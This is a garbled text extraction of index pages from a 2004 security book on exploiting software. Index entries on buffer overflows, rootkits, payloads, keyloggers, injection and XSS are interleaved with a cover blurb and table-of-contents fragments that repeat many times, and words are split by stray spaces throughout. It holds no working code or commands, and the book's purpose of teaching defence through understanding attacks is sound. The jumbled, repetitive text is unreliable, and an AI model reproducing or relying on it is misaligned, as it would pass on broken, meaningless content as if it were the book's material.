Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d KLOC ( t hou sand lines of code) in bu g r ates 2nd 3rd t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Knowledge-driv en mod els at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] La nguag e- based a tt ack s LD_ LI BRARY_PATH environm ent variable 2nd ldil in str uct ion ldo in st ruct ion 2nd 3rd Leadin g gh ost ch aract ers Leaf f un ct io ns 2nd • Table of Content s Leak ing dat a in sh ared b uff ers 2nd 3rd • I ndex Leapf roggin in code acing to 2nd Expl oit ing gSoftw a retrHow Br e ak Code LED k eyboa rd in dicat ors 2nd 3rd 4t h 5t h 6t h 7t h By Gr eg Hoglund , Gar y McGr aw Legalit y of r ev erse en gin eer in g 2nd 3rd Leveraging fa ult s li in stPub ructlish ioner: Addison Wesley Pub libc m oduDat le e: February 17, 200 4 Licen singI SBN: 0- 20 1- 786 95 -8 and Pages: reverse 51 en2gineering ASP model o f Lin ka ge on PA-RI SC Lin ux key loggers in term inal character inj ection in 2nd

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Lit ch field, David fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Lit t le-endian by t e ord erin g What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. in MI PS processors

endian Ex vs. p lobiigt in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d load_ file f unction 2nd t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Lo adable k ernel m odules (lk ms) at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Lo adLibrary fu nct ion Lo cal bran ch -inst ru ct ions on m PA-ay RI SC This m ust h ave book shock Lo 4t h t 5tf ound h scrcaliptcalls, k idweak die t2nd r eat3rd m en

y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he in m any hack ing book s, you w ill learn abou t

Lo cal com m and- lin e ut ilit ies 2nd Lo cal f ilen ames, URLs replaced by 2nd

Whyerssof w ar e Lo cal regist in tSPARC

ex ploit w ill con t inue t o be a ser ious p r oblem

Lo cal socket s 2nd

oratkionsecur Lo cat io When n-ba sed net comw put 2nd it y

m ech anisms do n ot w or k

Lo ck pick s

At t ack Lo g f iles

pat t er ns

corrup tin g

Rev er se engineer in g

for serv er sof t ware man ip ulat ing 2nd

Classic at t acks ag ainst serv er soft w ar e

overf low in

privileges f or 2nd

Sur pr ising at t acks ag ainst clien t soft war e

Lo gging, k ey 2nd Lo gic bom bs niqu es Tech

f or cr aft ing m aliciou s inpu t

Lo gical progr am flow Lo gically disttribut ed ical sy st em s ails The echn det

of b uf fer ov er f low s

Lo ng-t erm f ut u re of sof t ware Lo ve BuRoot g virus k it s Lo velace, Ada 2nd

Exw-level p lo i t in g access S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Lo disk 2nd soft w darae. Lo wlan ddresses lr reg ister in AI X/ PowerPC ls comm and lsof com m and lst rcpy f un ct ion findin g in rev erse eng in eer in g lt race t ool Lu nt , Teresa



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M ] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] Machine code disassem blers 2nd 3rd Mailing list s MailSweeper, in ject ion wit h Maliciou s in put , craf t ing [ See Craf t ed inpu t ] m allo c f unction 2nd Man aged-writ able m echan ism • Table of Content s Man uf act urers, EEPROM • I ndex Mapp in ging Softw a re How to Br e ak Code Expl oit API layer 2nd 3rd By Gr eg Hoglund , Gar y McGr aw in t er nal stat es 2nd m em o ry 2nd 3rd Pub lish er: Addison Wesley net work PubimDat e:em February 17, 200 4 runt em ory addresses Mar s Lander I SBN: 0- 20 1- 786 95 -8 Master boot r eco Pages: 51rd2 ( MBR), r eadin g an d wr it in g m axsize at t ribut e Measu rement in rev erse en gineering Medium - term f ut u re of sof t ware 2nd 3rd Melissa viru s m em cpy f un ct ion

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Mem ory fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? buf fer o verf lows in [ See Buf fer overf low] What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. dum ping 2nd

hardware, readin g an d writ ing 2nd 3rd 4t h 5t h 6t h 7t h 8t h

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d in rev erse eng in eer in g 2nd t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om man agement of 2nd 3rd 4t h 5t h 6t h at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . process snapsh ot s f or 2nd 3rd 4t h 5t h 6t h writin g t o- h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he This m ust f ound in m any hack ing book s, you w ill learn abou t

Mem ory kmid apping scr ipt die t r eat m en t for Troj an files 2nd 3rd runt im e

t wpoint ar es ex ploit Mem oryWhy page sof break

w ill con t inue t o be a ser ious p r oblem

Message pum ps

Whenersnet w or k Met a-charact

secur it y m ech anisms do n ot w or k

in e- mail headers 2nd

At iv t ack t er ns in equ alentpat request s 2nd 3rd 4t h in par sing

Rev er se engineer in g

m et a- char act ers an d t he FML mailing list ar chiv e microso ft Ou tlook view cont rol

Classic at t acks ag ainst serv er soft w ar e

misclassif icat ion in NTFS file str eam s specifier mples: I n tern et Ex plorer 2nd

Sur pr ising at t acks ag ainst clien t soft war e

Ou tlook XP an d HTML on reply or for ward overf low bin ary es resou Netm scape Tech niqu f orrcecrf ile aftining aliciou s

inpu t

overf low variables and t ags in Exim overf low tvariables anddet t ags in MidiPlu The echn ical ails of b ufgfer

ov er f low s

overf low wit h symbo lic link s in EFTP server PHPRoot commkand it s inj ect io n u sing delim it ers PHP global variables

Ex Post p loNuk i t ine gcont S oent ft w a regem is ent f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak m ana system XSS softschedulin w ar e. g a process with in ject ion Scr ipt in g.FileSy st emObj ect Scr ipt let .Ty peLib Sendm ail o verf low simple script inj ect io n slashes in alt erna te en codings Solaris get opt Sy slog( ) th e Out look app licat ion obj ect

Unicode en coding s in t he I I S serv er UNI X en vir onm en t variable URL encodin gs in I ceCast MP3 server URL encodin gs in Tit an applicat ion firewall Wscript .Net work WScript . Sh ell XSS in MP3 f iles and spreadsh eet s



Xt lib

m flr regist er



Table of Content s I ndex

Micro mach ines Expl oit ing Softw a re How to Br e ak Code Micro soft comp iler flaw 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h By Gr eg , Gar y work McGr(MSDN) aw Micro softHoglund Dev elo per Net Micro soft I I S Serv er elev eder: priv ileges inWesley Pubat lish Addison unicode s in 17, 200 4 Pub Datencoding e: February Micro soft operat ing system s, lines o f code in I SBN: 0- 20 1- 786 95 -8 Micro soft SQL Ser ver 7, gr ay box an alysis f or 2nd Pages: 51 2 MidiPlu g, overf low in Milit ary sit es honeypot s in 2nd telephon e syst em inf ilt rat ion Milit ary syst em s

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are air craf t 2nd fir ew em alls, beddedint ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. MI ME conversions MI PS inst ru ct io ns 2nd

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d MI PS- based pa yload con st ruct ion tMisclassificat echniqu esionused by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om 2nd at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Missile syst em s Mit nick, Kevin

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Mobile code 2nd 3rd 4t h 5t h 6t h Modeling com put ers

Mon it or pr ogram s f or in ject ion point s 2nd Mot oro la CPU,sof buftfer overf lowploit in Why w ar e ex

w ill con t inue t o be a ser ious p r oblem

Mou se int erru pt MP3 f iles, XSS in When net w or k

secur it y m ech anisms do n ot w or k

MSDN (Micr osoft Dev eloper Net work ) Mu ltibyAt t e tnack um ber represent pat t er ns at ion Mu ltiplat f orm payloads 2nd 3rd

engineer in g fro m Mu ltipleRev operer atse io ns, bu ff er ov erflow Mu ltiple parsers in sh ell com man d in ject ion Mu ltipleClassic pat hs of at autt acks hen ticaag tionainst

serv er soft w ar e

Mu ltiple- comm and t rick

Sur pr ising at t acks ag ainst clien t soft war e

Mu ltit h rea ded progr ams 2nd 3rd 4t h Mu nging dat a

Tech niqu es f or cr aft ing m aliciou s inpu t

MV- 22 Osprey 2nd

MyDialogProc fu nct ion 2nd

The t echn ical det ails of b uf fer ov er f low s Root k it s

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N ] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] NASA Mar s Lander Nav igat ion sy st ems NDI S libra ry 2nd 3rd NdisOpenAdapt er fu nct ion NdisRegist erProt oco l fu nct ion NdisRequ est fu nct ion 2nd • Table of Content s Negat iv e v alues, bu ff er ov erflow fro m 2nd • I ndex Nest fu nct ion calls Expling oit ing Softw a re How to Br e ak Code net sta rt _r oot _ comm and By Gr eg Hoglund , Gar y McGr aw net sto p _ root _ comm an d net cat program 2nd 3rd Pub lish er: Addison Wesley Net scape I -Plan et Applicat ion Serv er, decompilin g 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h 11t h 12t h Pub Dat February 17, 200 4 Net scape, ove: erflow in net st at comm I SBN:and 0- 20 2nd 1- 786 95 -8 Net t ermPages: program 51 2 Net work cards EEPROM in 2nd 3rd 4t h findin g 2nd 3rd 4t h 5t h 6t h Net work sniff ers for I DSs

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are for OS st ack ident if ication 2nd fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Net work wo rm s What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Net work -b ased f ault in ject ors Net work -b ased sof t ware

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Net work s t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om rat e of 2nd at t adopt ack , ion y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . code f or for m driv er -su pport book 2nd 3rdm4tay h 5tshock h 6t h 7tyhou—and 8t h 9t h 10tith This ust h ave

will cer t ainly educat e y ou. Get t ing bey ond t he scr mappin ipt k idg die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t scann ing NI DES int ru sion det ect ion sy st em NI MDA Why worm

sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

nm ap port scanner

When Non execu ta ble net files w or k

secur it y m ech anisms do n ot w or k

Non execu ta ble st ack s 2nd 3rd nop instAt rutctack ions pat t er ns in AI X/ Po werPC

Rev er se engineer in g

in SPARC 2nd NOT operat or

Classic at t acks ag ainst serv er soft w ar e

NTFS f ile st ream s specif ier

NULL bu ff er s in helpct r. exe

Sur pr ising at t acks ag ainst clien t soft war e

NULL ch aract ers a nd term inat ors in AITech X/ Po werPC niqu es

f or cr aft ing m aliciou s inpu t

in bu ff er overf lo w 2nd 3rd in MI PS opcod es ical 2nd The t echn

det ails of b uf fer ov er f low s

in pay loads 2nd in rev Root ersing k itparser s code in st ack over flow 2nd 3rd 4t h 5t h 6t h 7t h 8t h

Ex post p lo fix i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak 2nd soft w arrepresent e. Nu mber at ion in in ject ion v ector s

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] Object sharin g, design-level vulnerab ilit ies in Object s, f ut ure of 2nd Observ abilit y 2nd Observ able eff ects, rem ov ing Off -by - one NULL t erm inat ion 2nd 3rd 4t h 5t h Oil edded of sy st em s in s • t ank ers, embTable Content Olly • Dbg too l

I ndex

OnOpenAdapt erDon e f unction Expl oit ing Softw a re How to Br e ak Code OnOpenAdapt erOn e f unction By Gr eg Hoglund , Gar y McGr aw OnSt ubDispat ch fu nct ion 2nd OnUn load f un ct ion 2nd 3rd Pub lish er: Addison Wesley Opcodes e: February OpenPub d ynDat amical sy st em s17, 200 4 open fu nct I SBN: ion in0-shell 20 1- 786 co mm 95 and -8 inj ection Open short est pat h f irst ( OSPF), b uff er o verf low in Pages: 51 2 Open-en ded sy st em s Open-syst em s v iew 2nd 3rd damage pot en t ial in 2nd ex posu re an d pot ency in 2nd risk in 2nd

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are OpenDat aSou rce f un ct ion fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? OpenThr ead f unct ion What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Operat in g syst em s

en capsulat ion of Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d ex t ensibilit y of t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om u re of 2nd at t fut ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . in t egr at io n o f Oracle 9 iust - h ave This m

book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he hack ing book s, you w ill learn abou t

OS ackkident if icat ion in pat ternin s 2nd scr st ipt id die t r eat mat ent ack t f ound m any

OSPF (open sh ort est pat h first) , buf fer ov er flow in Osprey aircra ft , sof t ware f ailu res in 2nd Out in stWhy ruct ionsof t w ar e

ex ploit w ill con t inue t o be a ser ious p r oblem

Out r egist ers in SPARC

or k ion secur y m ech anisms Out lookWhen applicatnet ion ,winject wit hit2nd

do n ot w or k

Out look View Con tr ol, inject ion wit h

t ack er pat ns t erns Out put At event s inpat at tatck Out put point s in p art ition an alysis

Rev er se engineer in g

Out side-in break point s Out sou rced sof t ware

Classic at t acks ag ainst serv er soft w ar e

backdoors in

fut u re of 2nd

Sur pr ising at t acks ag ainst clien t soft war e

Overf low, buf fer [ See Buf fer overf low] Overwr Tech it in g niqu es

f or cr aft ing m aliciou s inpu t

ex cept ion han dler f rames mem o ry headers The t echn ical

det ails of b uf fer ov er f low s

Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P ] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] PA-RI SC payloads const ru ct io n o f 2nd in t er -space branching on 2nd in t er -space t rampo lin es wit h locat ion of 2nd 3rd sta cks in 2ndTable 3rd of Content s Packet s • I ndex



desyn chron izataion 2ndto Br e ak Code Expl oit ing Softw re of How leaking dat a in 2nd By Gr eg Hoglund , Gar y McGr aw Parallel EEPROM 2nd Parallel por t int erru pt s Pub Param etlish er s er: Addison Wesley Pub February 17, 200 4fr om ex panDat sione: of, bu ff er ov erflow in sh ell I SBN: com0man 20 d 1-in 786 ject 95ion -8 Parser code, rev51 er2sing [ See Craf t ed inpu t ; Rev er sing parser code] Pages: Parsin g buf fer o verf lows f rom comm ands delim iters f or Part it ion analysis 2nd 3rd

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are passwd com man d fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Passwor d lim it at ion s What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Pat ch es

code 2nd Ex bin p loary i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d NT k ern el 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h 11t h 12t h t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om peeph ole pat ches 2nd 3rd at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . findin g in rev erse- h eng in eer in g 2nd This m ust ave book m 3rd ay Pat scrent ipts

shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

PATH environm ent v ariable Pat t erns [ See also At tack pat t er ns]

Why Payloads

sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

act ivat ion of 2nd 3rd

When net w or secur it y in bu ff er overf lo w 2ndk 3rd

m ech anisms do n ot w or k

checksum / h ash loading for 2nd

At tamic ack jupat ns f or 2nd dyn mp tter ables hard- coded f un ct ion calls f or

Rev er se engineer in g

size of

XOR p rot ection f or

Classic at t acks ag ainst serv er soft w ar e

in in ject ion vect ors 2nd 3rd 4t h 5t h memo ry locat ions f or 2nd 3rd 4t h

Sur pr ising at t acks ag ainst clien t soft war e

on RI SC arch itect u res branch delayes wit fhor Tech niqu

cr aft ing m aliciou s inpu t

in AI X/ Po werPC 2nd 3rd 4t h 5t h inThe PA- RI SC 2nd 3rddet 4t hails 5t h 6t h fer 8t h 9t t echn ical ofh b7tuf ovh er f low s in SPARC 2nd 3rd 4t h inRoot st ructkion it slocat ion s in 2nd MI PS in st ruct ions 2nd

Ex p lo in g S o ft3rd w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak oni tHPUX 2nd soft ar e. PCL (w print er co nt rol lan guage) codes PDAs, em bedded sy st em s in Peephole pat ch es 2nd 3rd Perl em bedding with in ASP pages system calls in 2nd tain t m ode in 2nd Perm issions on dir ector ies

wit h ACLs Person -in- t he-m iddle at t ack s Pha se space analysis 2nd 3rd 4t h Pho ne ph reaks Pho ne syst ems blu e box es f or 2nd 3rd in -ban d sig nals wit h 2nd 3rd PHP

• •

Table of Content s

comm and inj ect ion in

I ndex

glo bal variables in 2nd 3rd Expl oit ing Softw a re How to Br e ak Code Phr ack Ma gazine, 2nd 3rd 4t h By Gr eg Hoglund y McGr Physical mem ory,, Gar writ ing to aw Physical securit y PI CsPub (Pr ogram I ntWesley errup t Cont rollers) 2nd lish er: mable Addison PI DsPub (process ificat ion Dat e: ident February 17,s)200 4 for t hreads I SBN: 0- 20 1- 786 95 -8 in GDB Pages: 51 2 Ping packet s PI T t ool Point ers and point er operat ions buf fer o verf low f rom 2nd 3rd 4t h 5t h 6t h 7t h byt e o per ation s wit h

How d olog/ oes Epilog sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are in Pr fir ew alls, int parser ru sioncode det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? in rev ersing What pills t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Poison poll f un ct ion

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Polymor phism tPopechniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om up windows fro m inject ion at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Port scans 2nd Port s on cont roller chips

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

POST request s

Post f ix NULL t ermin ato rs 2nd

Post Nu k e con ten t ma nagemen t sy st em Pot encyWhy in op en -sy st ems iewploit 2nd sof tw ar e vex

w ill con t inue t o be a ser ious p r oblem

Preloader, local filenam es wit h Prim aryWhen I DE ch annel net winort erk rupt secur it y

m ech anisms do n ot w or k

Prim ary opcodes Prin ciple leastpat privtileg e Atoft ack er ns lim it at ion s of whitRev e lister ingse in engineer in g Prin ter cont rol langu age ( PCL) codes

at gt acks Prin tersClassic and prin tin

ag ainst serv er soft w ar e

dat a f rom m em ory 2nd 3rd

Sur pr ising at t acks ag ainst clien t soft war e

in -ban d sig nals wit h 2nd prin tf f un ct ion

Tech niqu es f or cr aft ing m aliciou s inpu t

Priv ileged resour ces att ackin g

The t echn ical det ails of b uf fer ov er f low s

in serv er soft ware 2nd 3rd 4t h program Rootskwr it itsin g t o Privilige escalat ion 2nd 3rd 4t h Process Ex p lo iident t in gificat S oion ftsw( PI a Ds) re is

f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak

hreads softforw tar e. in GDB Process inj ection f or hiding progra ms Process records, r em ov ing 2nd 3rd 4t h Process- perm issions equ al t ru st s Processes att ach ing t o 2nd en um er at in g 2nd for reading fro m unt ru st ed sou rces

hiding in rev erse eng in eer in g 2nd 3rd 4t h 5t h 6t h schedulin g on serv er soft ware 2nd spawning , hand le inherit an ce in Progr am execu tion f low, single steppin g f or 2nd Progr am st ruct u re an d logic, rev erse engin eerin g f or 2nd Progr amm able I n t err upt Cont rollers ( PI Cs) 2nd Progr ams usin g dr iv ers 2nd



Table of Content s



I ndex

Prolog/ Epilog code 2nd

canary valu es in 2nd 3rd Expl oit ing Softw a re How to Br e ak Code nonex ecut able st acks in 2nd 3rd By Gr eg Hoglund , Gar Prom iscuo us mode 2ndy McGr aw Prot ocol clarit y in packet defr agment at ion PROTOS t ool Pub lish er: Addison Wesley PS/ 2 Pub m ouse int February errupt Dat e: 17, 200 4 Pur ify t ool 2nd I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] Qualit y assu rance (QA) t est in g lim it at ion s of overlook ing Query st rin gs in f ile sy st em at tacks XSS in 2nd Table of Content s QueryDirect oryFile f unct ion • I ndex



Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R ] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] Race condit ions det ect ing in geogra phically dist ribu ted syst em s Radar sy st ems em bedded sy st ems in



flash ROM in Table of Content s

Raw pack et int erfaces, • I ndex Jav a support for React ive subscript n serv ices, I DSs 2nd Expl oit ing Softw io a re How to Br e akasCode React ive t ech nologies By Gr eg Hoglund , Gar y McGr aw read fu nct ion Reading Pub lish er:EEPROM Addisonfor Wesley en abling, Pub uDat e: stFebruary 17, 200 4 from nt ru ed sou rces hardware I SBN:mem 0- 20 ory 1- 786 2nd95 3rd -8 4t h 5t h 6t h 7t h 8t h mastPages: er boot51 record 2 memo ry in reverse engineering 2nd ReadProcessMem ory fu nct ion ReadRegist ry f unction 2nd 3rd Real-t im e clock in terr upt Reboot ing for rem ovin g observ able ef fect s

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are REC progr am fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Recov ery sy st em s What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Red po in t ing 2nd Redirect ion

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d dir ector y t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t execut ack , ying ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . ser ver- side page references Trojan ex-ecut ables 2nd 3rd 4t h shock 5t h 6t h 7t h This m ust h ave book m ay y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he wit h CWD scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Reference mon it ors Reflect ion

Whytr ust sofedt wsitar against ese

ex ploit w ill con t inue t o be a ser ious p r oblem

wit h in- band sign als Regist erWhen ing

net w or k secur it y m ech anisms do n ot w or k

drivers 2nd 3rd
